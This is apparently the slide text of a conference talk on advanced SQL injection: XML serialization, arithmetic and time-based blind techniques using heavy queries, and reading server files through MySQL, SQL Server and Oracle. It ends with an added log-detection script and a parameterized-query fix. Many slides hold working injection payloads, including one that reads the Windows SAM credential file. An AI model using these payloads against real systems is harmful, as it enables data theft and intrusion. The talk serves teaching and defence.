Spain (…not only bulls…)

Agenda
• Serialized SQL Injection
– Demo: XML Extractor
• Arithmetic SQL Injection
– Divide by Zero
– Sums and subtractions
– Type overflow
– Demo
• Remote File Downloading using Blind SQL Injection
– SQL Server
– MySQL
– Oracle
– Demo: RFD Tool
• Time-Based Blind SQL Injection using heavy queries
– Demo: Marathon Tool

Serialized SQL Injection
• Goal: to merge complex resultsets into a single showable field.
• XML serialization functions allow a resultset to be converted into one XML string.
• It's possible to download a big amount of data with single, simple injections.

SQL Server
• FOR XML: Retrieves data as a single string representing an XML tree.
• RAW: Mandatory option. Shows the information converting each row of the result set into an XML element in the form <row />.
• BINARY BASE64: The query will fail if we find any BINARY data type column (containing images, or passwords) if this option is not explicitly specified.
– union select '1','2','3',(select * from sysusers for xml raw, binary base64)
• XMLSCHEMA: obtains the whole table structure, including the data types, column names and other constraints.
– Described by Dani Kachakil

MySQL
• No default XML support, requires a server side extension
• GROUP_CONCAT (v 4.1+)

Demo: Serialized SQL Injection

Arithmetic Blind SQL Injection
Blind Attacks
• Attacker injects code but can't access the data directly.
• However, this injection changes the behavior of the web application.
• Then the attacker looks for differences between true code injections (1=1) and false code injections (1=2) in the response pages to extract data.
– Blind SQL Injection
– Blind XPath Injection
– Blind LDAP Injection

Blind SQL Injection Attacks
• Attacker injects:
– “True where clauses”
– “False where clauses”
– Ex:
• Program.php?id=1 and 1=1
• Program.php?id=1 and 1=2
• Program doesn't return any visible data from the database or data in error messages.
• The attacker can't see any data extracted from the database.

Blind SQL Injection Attacks
• Attacker analyzes the response pages looking for differences between the “True-Answer Page” and the “False-Answer Page”:
– Different hashes
– Different HTML structure
– Different patterns (keywords)
– Different linear ASCII sums
– “Different behavior”
• For example: response time

Blind SQL Injection Attacks
• If any difference exists, then:
– Attacker can extract all information from the database
– How? Using “booleanization”
• MySQL:
– Program.php?id=1 and 100>(ASCII(Substring(user(),1,1)))
» “True-Answer Page” or “False-Answer Page”?
• MSSQL:
– Program.php?id=1 and 100>(Select top 1 ASCII(Substring(name,1,1)) from sysusers)
• Oracle:
– Program.php?id=1 and 100>(Select ASCII(Substr(username,1,1)) from all_users where rownum<=1)
Arithmetic Blind SQL Injection
• The query forces the parameter to be numeric
– SELECT field FROM table WHERE id=abs(param)
• Boolean logic is created with math operations
– Divide by zero
– Sums and subtractions
– Type overflows

Arithmetic Blind SQL Injection
• Divide by zero (David Litchfield)
– Id=A+(1/(ASCII(B)-C))
• A -> Param value originally used in the query.
• B -> Value we are searching for, e.g.: Substring(passwd,1,1)
• C -> Counter [0..255]
– When ASCII(B)=C, the DB will generate a divide by zero exception.

Arithmetic Blind SQL Injection
• Sums and subtractions
– Id=A+ASCII(B)-C
• A -> Param value originally used in the query.
• B -> Value we are searching for, e.g.: Substring(passwd,1,1)
• C -> Counter [0..255]
– When ASCII(B)=C, the response page of id=A+ASCII(B)-C will be the same as that of id=A.

Arithmetic Blind SQL Injection
• Value type overflow
– Id=A+((C/ASCII(B))*(K))
• A -> Param value originally used in the query.
• B -> Value we are searching for, e.g.: Substring(passwd,1,1)
• C -> Counter [0..255]
• K -> Value that overflows the type defined for A
– (e.g. if A is integer, then K=2^32)
– When C/ASCII(B)==1, K*1 overflows the data type

Demo:
• Divide by zero
• Sums and subtractions
• Integer overflow
Remote File Downloading using Blind SQL Injection techniques

Accessing Files
• Two ways:
– Load the file in a temp table
• and i>(select top 1 ASCII(Substring(column)(file,pos,1)) from temp_table ??
– Load the file in the query
• With every query the file is loaded in memory
• I am very sorry, engine
• and i>ASCII(Substring(load_file(file,pos,1))??

SQL Server 2K - External Data Sources
• Only for known filetypes:
– Access through drivers: txt, csv, xls, mdb, log
– And 200>ASCII(SUBSTRING(SELECT * FROM OPENROWSET('MSDASQL', 'Driver = {Microsoft Text Driver (*.txt; *.csv)};DefaultDir=C:;','select top 1 * from c:\dir\target.txt'),1,1))
• Privileges
– HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSSQLServer\Providers\DisallowAdhocAccess=0
– By default this key doesn't exist, so only users with the Server Admin role can use these functions.
• NTFS permissions

SQL Server 2K – Bulk option
• Access to any file
– ; Create Table TempTable as (row varchar(8000)) --
– ; Bulk Insert TempTable From 'c:\file.ext' With (FIELDTERMINATOR = '\n', ROWTERMINATOR = '\n') --
– ; alter table TempTable add num int IDENTITY(1,1) NOT NULL
– and (select COUNT(row) from TempTable)
– and (select top 1 len(row) from TempTable where num = rownum)
– and (select top 1 ASCII(SUBSTRING(row,1,1)) from TempTable where num = 1)
– ; Drop Table TempTable--
• Privileges needed
– Server Role: Bulkadmin
– Database Role: db_owner or db_ddladmin
• NTFS permissions

SQL Server 2k5 – 2k8
• OPENDATASOURCE and OPENROWSET supported
• Bulk options improved
– AND 256 > ASCII(SUBSTRING ((SELECT * FROM OPENROWSET(BULK 'c:\windows\repair\sam', SINGLE_BLOB) As Data), 1, 1))--
• Permissions
• Bulkadmin Server Role
• External Data Sources enabled
• Sp_configure
• Surface Configuration Tool for features

MySQL
• LoadFile
– SELECT LOAD_FILE(0x633A5C626F6F742E696E69)
• SQLbfTools: MySQLget command (illo and dab)
• http://www.reversing.org/node/view/11
• Load Data infile
– ; Create table C8DFC643 (datos varchar(4000))
– ; Load data infile 'c:\boot.ini' into table C8DFC643
– ; alter table C8DFC643 add column num integer auto_increment unique key
– and (select count(num) from C8DFC643)
– and (select length(datos) from C8DFC643 where num = 1)
– and (select ASCII(substring(datos,5,1)) from C8DFC643 where num = 1)
– ; Drop table C8DFC643

Oracle – Plain Text files
• External Tables
– ; execute immediate 'Create Directory A4A9308C As ''c:\'' '; end; --
– ; execute immediate 'Create table A737D141 ( datos varchar2(4000) ) organization external (TYPE ORACLE_LOADER default directory A4A9308C access parameters ( records delimited by newline ) location (''boot.ini''))'; end;--
– Only plain text files

Oracle – DBMS_LOB
; execute immediate ' DECLARE l_bfile BFILE; l_blob BLOB; BEGIN INSERT INTO A737D141 (datos) VALUES (EMPTY_BLOB()) RETURN datos INTO l_blob; l_bfile := BFILENAME(''A4A9308C'', ''Picture.bmp''); DBMS_LOB.fileopen(l_bfile, Dbms_Lob.File_Readonly); DBMS_LOB.loadfromfile(l_blob,l_bfile,DBMS_LOB.getlength(l_bfile)); DBMS_LOB.fileclose(l_bfile); COMMIT; EXCEPTION WHEN OTHERS THEN ROLLBACK; END;' ; end; --
Time-based Blind SQL Injection using heavy queries

Time-Based Blind SQL Injection
• In scenarios with no differences between the “True-Answer Page” and the “False-Answer Page”, time delays can be used.
• Injection forces a delay in the response page when the condition injected is True.
– Delay functions:
• SQL Server: waitfor
• Oracle: dbms_lock.sleep
• MySQL: sleep or Benchmark function
• Postgres: pg_sleep
– Ex:
• ; if (exists(select * from users)) waitfor delay '0:0:5'

Exploit for Solar Empire Web Game

Deep Blind SQL Injection
• Time delay depends on the wanted value.
• E.g. “a” -> 10 s delay, “b” -> 11 s delay, …
• http://labs.portcullis.co.uk/application/deep-blind-

Time-Based Blind SQL Injection
• What about database engines without delay functions, i.e., MS Access, Oracle connections without PL/SQL support, DB2, etc.?
• Can we still perform an exploitation of Time-Based Blind SQL Injection attacks?

“Where-Clause” execution order
Select “whatever” From whatever Where condition1 and condition2
- Condition1 lasts 10 seconds
- Condition2 lasts 100 seconds
Which condition should be executed first?
The heavy condition first
Condition2 (100 sec) | Condition1 (10 sec) | Condition2 & Condition1 | Response Time
TRUE                 | FALSE               | FALSE                   | 110 sec
TRUE                 | TRUE                | TRUE                    | 110 sec
FALSE                | Not evaluated       | FALSE                   | 100 sec

The light condition first
Condition1 (10 sec) | Condition2 (100 sec) | Condition1 & Condition2 | Response Time
TRUE                | FALSE                | FALSE                   | 110 sec
TRUE                | TRUE                 | TRUE                    | 110 sec
FALSE               | Not evaluated        | FALSE                   | 10 sec
Time-Based Blind SQL Injection using Heavy Queries
• Attacker can perform an exploitation delaying the “True-answer page” using a heavy query.
• It depends on how the database engine evaluates the where clauses in the query.
• There are two types of database engines:
– Databases without an optimization process
– Databases with an optimization process

Time-Based Blind SQL Injection using Heavy Queries
• Attacker could inject a heavy cross-join condition for delaying the response page in True-Injections.
• The cross-join injection must be heavier than the other condition.
• Attacker only has to know or guess the name of a table with select permission in the database.
• Example in MSSQL:
– Program.php?id=1 and (SELECT count(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)>1 and 300>(select top 1 ascii(substring(name,1,1)) from sysusers)

“Default” tables to construct a heavy query
– Microsoft SQL Server
• sysusers
– Oracle
• all_users
– MySQL (version 5)
• information_schema.columns
– Microsoft Access
• MSysAccessObjects (97 & 2000 versions)
• MSysAccessStorage (2003 & 2007)

“Default” tables to construct a heavy query
• …or whatever you can guess
– Clients
– Customers
– News
– Logins
– Users
– Providers
– …Use your imagination…
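From the defender's side, the probe shapes described on these slides (booleanization with ASCII(Substring(...)), delay functions, file access through OPENROWSET/LOAD_FILE/bulk loads, and self-joined catalogue tables for a heavy query) are easy to spot in web-server logs. The detector below is an added example, not part of the presentation or the Marathon Tool; the access-log lines are constructed, and the self-join threshold is an assumption chosen for illustration.

```python
import re
from urllib.parse import unquote_plus

# Constructed web-server access-log lines (not from the presentation); the
# injected requests mirror the probe shapes the slides describe.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Feb/2009:10:01:02 +0000] "GET /program.php?id=1 HTTP/1.1" 200 512
10.0.0.5 - - [12/Feb/2009:10:01:09 +0000] "GET /program.php?id=1%20and%20100%3E(ASCII(Substring(user(),1,1))) HTTP/1.1" 200 512
10.0.0.5 - - [12/Feb/2009:10:01:15 +0000] "GET /program.php?id=1;if%20(exists(select%20*%20from%20users))%20waitfor%20delay%20'0:0:5' HTTP/1.1" 200 512
10.0.0.5 - - [12/Feb/2009:10:01:40 +0000] "GET /program.php?id=1%20and%20(SELECT%20count(*)%20FROM%20sysusers%20AS%20sys1,%20sysusers%20as%20sys2,%20sysusers%20as%20sys3)%3E1 HTTP/1.1" 200 512
10.0.0.5 - - [12/Feb/2009:10:02:01 +0000] "GET /program.php?id=1%20and%20256%3EASCII(SUBSTRING((SELECT%20*%20FROM%20OPENROWSET(BULK%20'c:%5Cwindows%5Crepair%5Csam',SINGLE_BLOB)%20As%20Data),1,1)) HTTP/1.1" 500 0
10.0.0.7 - - [12/Feb/2009:10:02:30 +0000] "GET /news.php?id=42&page=2 HTTP/1.1" 200 2048
"""

# Tag -> pattern, checked against the URL-decoded, lower-cased request target.
SIGNATURES = [
    ("booleanization", re.compile(r"ascii\s*\(\s*substr(?:ing)?\s*\(")),
    ("delay", re.compile(r"waitfor\s+delay|\bsleep\s*\(|\bbenchmark\s*\(|"
                         r"pg_sleep\s*\(|dbms_lock\.sleep")),
    ("file_access", re.compile(r"\bload_file\s*\(|\bopenrowset\s*\(|\bopendatasource\s*\(|"
                               r"\bbulk\s+insert\b|\bload\s+data\s+infile\b|"
                               r"dbms_lob\.|organization\s+external")),
]

# Catalogue tables the slides list for building a heavy cross join. The same
# table name repeated in one GET parameter is the signal; a legitimate request
# almost never self-joins these. The threshold is an assumed tuning value.
HEAVY_QUERY_TABLES = ["sysusers", "all_users", "information_schema.columns",
                      "msysaccessobjects", "msysaccessstorage"]
SELF_JOIN_THRESHOLD = 2

REQUEST_RE = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/')


def classify(request_target: str) -> list:
    """Return the tags matched by one request target (empty list if benign)."""
    q = unquote_plus(request_target).lower()
    tags = [tag for tag, pattern in SIGNATURES if pattern.search(q)]
    for table in HEAVY_QUERY_TABLES:
        if len(re.findall(r"\b" + re.escape(table) + r"\b", q)) >= SELF_JOIN_THRESHOLD:
            tags.append("heavy_query")
            break
    return tags


def scan_log(text: str) -> list:
    """Return (line_number, tags) for every log line whose request is flagged."""
    flagged = []
    for number, line in enumerate(text.splitlines(), start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        tags = classify(match.group(1))
        if tags:
            flagged.append((number, tags))
    return flagged


if __name__ == "__main__":
    for number, tags in scan_log(SAMPLE_LOG):
        print(f"line {number}: {', '.join(tags)}")
```

A heavy-query probe can also be correlated with response time: the slides' own measurements (1 second for a false answer against 6 to 39 seconds for a true one) mean a burst of slow responses to one parameter is itself a detection signal.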
Ex 1: MS SQL Server
Query lasts 14 seconds -> True-Answer

Ex 1: MS SQL Server
• Query lasts 1 second -> False-Answer

Ex 2: Oracle
Query lasts 22 seconds -> True-Answer

Ex 2: Oracle
Query lasts 1 second -> False-Answer

Ex 3: Access 2000
Query lasts 6 seconds -> True-Answer

Ex 3: Access 2000
Query lasts 1 second -> False-Answer

Ex 4: Access 2007
Query lasts 39 seconds -> True-Answer

Ex 4: Access 2007
Query lasts 1 second -> False-Answer

Marathon Tool
• Automates Time-Based Blind SQL Injection attacks using heavy queries in SQL Server, MySQL, MS Access and Oracle databases.
• Schema extraction from known databases
• Extracts data using heavy queries no matter which database engine is used (without schema)
• Developed in .NET
• Source code available
Prevention: Don't forget Bobby Tables! SANITIZE YOUR QUERIES!
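The arithmetic section showed that wrapping the parameter in abs() inside the SQL text does not make it numeric; the application has to validate the type and bind the value. As an added example (not the presentation's code), a Python/sqlite3 stand-in for the id=abs(param) pattern beside a parameterized version; the users table and its rows are constructed.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the vulnerable application's database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", [(1, "alice"), (2, "bob")])
    return conn


def lookup_vulnerable(param: str) -> list:
    """The pattern from the Arithmetic Blind SQL Injection slides.

    abs() is meant to 'force the parameter to be numeric', but the raw string is
    still concatenated into the statement, so a sums-and-subtractions probe such
    as 1+(65-65) is evaluated by the engine exactly like the legitimate id=1.
    (SQLite returns NULL for division by zero instead of raising, so the
    divide-by-zero variant is not reproduced here.)
    """
    conn = make_db()
    sql = "SELECT name FROM users WHERE id=abs(" + param + ") ORDER BY id"
    return [row[0] for row in conn.execute(sql)]


def lookup_safe(param: str) -> list:
    """Validate the type in the application, then bind the value as a parameter.

    The database never sees attacker-controlled SQL text; anything that is not
    a plain integer is rejected before a query is built.
    """
    try:
        user_id = int(param)
    except ValueError:
        return []
    conn = make_db()
    return [row[0] for row in conn.execute(
        "SELECT name FROM users WHERE id=? ORDER BY id", (user_id,))]


if __name__ == "__main__":
    for probe in ("1", "1+(65-65)", "1+(65-66)"):
        print(f"{probe!r}: vulnerable={lookup_vulnerable(probe)} safe={lookup_safe(probe)}")
```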
Questions?
• Speakers:
– Chema Alonso (chema@informatica64.com)
– Palako (palako@lateatral.com)
• Authors
– Chema Alonso (chema@informatica64.com)
– Alejandro Martín (amartin@informatica64.com)
– Antonio Guzmán (aguzman@urjc.es)
– Daniel Kachakil (dani@kachakil.org)
– José Palazón “Palako” (palako@lateatral.com)
– Marta Beltran (mberltran@urjc.es)